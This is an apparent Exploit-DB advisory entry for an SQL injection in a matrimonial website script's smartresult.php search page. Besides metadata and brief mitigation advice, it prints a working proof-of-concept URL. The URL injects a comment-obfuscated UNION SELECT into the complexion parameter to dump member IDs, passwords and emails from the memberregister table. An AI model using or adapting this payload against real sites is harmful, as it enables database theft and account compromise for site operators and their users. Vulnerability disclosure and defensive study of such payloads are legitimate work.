www.site.com/script/smartresult.php?gender=&agefrom=&ageto=&maritalstatus=Never+Married&heightfrom=&heightto=&complexion=&special=None&community=&mother=&pro=&diet=&country=&state1=&city1=&Search=Search

vendor:

N/A

by:

Easy Laster, Undergroundagents, 4004-Security-Project

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

www.site.com/script/smartresult.php?gender=&agefrom=&ageto=&maritalstatus=Never+Married&heightfrom=&heightto=&complexion=&special=None&community=&mother=&pro=&diet=&country=&state1=&city1=&Search=Search

This vulnerability allows an attacker to inject malicious SQL code into the vulnerable parameter of the website. This can be exploited to gain access to the database and extract sensitive information such as usernames, passwords, and other confidential data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+ICQ : 11-051-551
+Info : http://www.2daybiz.com/matrimonial_script.html
+Discovered by Easy Laster 4004-security-project.com
+Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox.
   
---------------------------------------------------------------------------------------
                                                                                        
 ___ ___ ___ ___                         _ _           _____           _         _
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|         
   
   
----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/script/smartresult.php?gender=&agefrom=&ageto=&marital
status=Never+Married&heightfrom=&heightto=&complexion=&special=None&community=&mother
=&pro=&diet=&country=&state1=&city1=&Search=Search
----------------------------------------------------------------------------------------
+POC : www.demo.com/script/smartresult.php?gender=&agefrom=&ageto=&maritalstatus=Never
+Married&heightfrom=&heightto=&complexion=%27+/**/union+/**/select+1,2,3,4,5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39
,40,41,GrOuP_CoNcAt%28id,0x3a,profileid,0x3a,password,0x3a,email%29,43,44,45,46,47,48,
49,50,51,52,53/**/from/**/memberregister/**/wHerE/**/id=1/**/--+&special=None&communi
ty=&mother=&pro=&diet=&country=&state1=&city1=&Search=Search